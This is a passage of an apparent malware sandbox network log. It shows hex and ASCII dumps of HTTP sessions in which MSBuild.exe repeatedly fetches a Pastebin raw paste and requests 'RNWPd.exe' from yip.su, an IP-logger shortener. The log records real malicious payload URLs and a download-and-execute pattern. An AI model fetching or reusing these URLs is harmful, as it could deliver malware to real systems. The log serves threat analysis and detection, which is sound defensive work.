29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
2024-09-16 19:22:23 UTC	1369	IN	Data Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
2024-09-16 19:22:23 UTC	1369	IN	Data Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
2024-09-16 19:22:23 UTC	1369	IN	Data Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
2024-09-16 19:22:23 UTC	162	IN	Data Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49765	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:27 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:28 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4339b568e818ee-EWR
2024-09-16 19:22:28 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:28 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:28 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:28 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49766	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:28 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:29 UTC	902	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:28 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rbyZqsPf66smadrJQZ3uMHj44QNIBD%2FidatwKikGDf5%2BB4mGVXt0Cn%2F6A4TwaNrMga1JuLbHKYLw2HCo7ecUuwLTRzPVKNTV9nfjxyo0q3%2BE2A4qtZtJD1I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4339ba6e9d4332-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:29 UTC	467	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:29 UTC	1369	IN	Data Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
2024-09-16 19:22:29 UTC	1369	IN	Data Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
2024-09-16 19:22:29 UTC	1369	IN	Data Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
2024-09-16 19:22:29 UTC	1369	IN	Data Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
2024-09-16 19:22:29 UTC	1369	IN	Data Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
2024-09-16 19:22:29 UTC	158	IN	Data Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49767	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:34 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:34 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4339dc1ea141ad-EWR
2024-09-16 19:22:34 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:34 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:34 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
